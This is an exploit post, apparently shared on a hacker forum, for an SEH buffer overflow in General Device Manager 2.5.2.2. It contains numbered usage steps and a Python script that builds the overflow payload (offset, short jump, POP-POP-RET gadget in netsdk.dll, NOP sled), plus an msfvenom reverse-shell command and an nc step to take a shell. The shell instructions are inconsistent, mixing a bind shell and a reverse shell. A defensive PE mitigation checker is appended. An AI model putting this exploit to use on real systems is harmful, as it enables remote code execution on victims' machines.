
General Device Manager 2.5.2.2 - Buffer Overflow (SEH)

HackApt-37 Team, verified member

Hacker Warehouse site administrator
# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/mdawmda2ntq=
# Software Link 2:
# Exploit Author: Ahmet Ümit Bayram
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit
# 1.- Run the Python code: Exploit.py
# 2.- Open pwned.txt and copy all of its contents to the clipboard
# 3.- Open Device Manager and press Add Device
# 4.- Paste the contents of pwned.txt into the "IP Address" field
# 5.- Click "OK"
# 6.- nc.exe <local IP> 1337, and you will have a bind shell
# 7.- R.I.P. Condor 3
import struct

offset = b'A' * 1308
nseh = b'\xeb\x06\x90\x90'  # jmp short +6 over the SEH record into the NOP sled
seh = struct.pack('<I', 0x10081827)  # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [netsdk.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:
nops = b'\x90' * 32
# shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b '\x00\x0a\x0d' -f python --var-name shellCode
shellCode = b''  # msfvenom -f python output (shellCode += b'...' lines) is appended here
final_payload = offset + nseh + seh + nops + shellCode

# Write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print('[+] Creating %s byte evil payload.' % len(final_payload))
        f.write(final_payload)
    print('[+] File created!')
except OSError:
    print('Unable to create file!')
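From the defender's side, the comment on the `seh` line records exactly why netsdk.dll was usable as the SEH handler address: the module carries no ASLR opt-in, cannot be rebased, and has no SafeSEH table. The following Python is an added example (not part of the original exploit) that reads those flags straight from a PE32 header; `build_pe32` is a constructed, minimal header used only to exercise the check, and the SafeSEH result is a necessary condition only (it confirms a Load Config directory exists, not the handler table inside it).

```python
import struct

# Flag values from the PE/COFF specification.
IMAGE_FILE_RELOCS_STRIPPED = 0x0001              # no .reloc section: module cannot be rebased
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP opt-in
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10           # directory that carries the SafeSEH handler table


def pe_mitigations(data: bytes) -> dict:
    """Report mitigation flags of a PE32 image held in memory (the columns mona prints per module)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    characteristics = struct.unpack_from("<H", data, coff + 18)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:  # PE32 only: what a 32-bit SEH exploit targets
        raise ValueError("not a PE32 image")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    load_cfg_size = 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG:
        entry = opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        load_cfg_size = struct.unpack_from("<II", data, entry)[1]
    return {
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "rebase": not (characteristics & IMAGE_FILE_RELOCS_STRIPPED),
        # Necessary condition only: a SEHandlerTable can exist only inside a Load Config directory.
        "safeseh_possible": load_cfg_size > 0,
    }


def build_pe32(dll_chars: int, characteristics: int = 0, load_cfg_size: int = 0) -> bytes:
    """Constructed minimal PE32 header (no sections) used only to exercise pe_mitigations()."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic: PE32
    struct.pack_into("<H", opt, 70, dll_chars)               # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, 0x1000, load_cfg_size)
    return dos + b"PE\0\0" + coff + bytes(opt)
```

Run `pe_mitigations(open(path, "rb").read())` over the DLLs an application ships; any module reporting all four values False is the kind of reusable address source this exploit depended on.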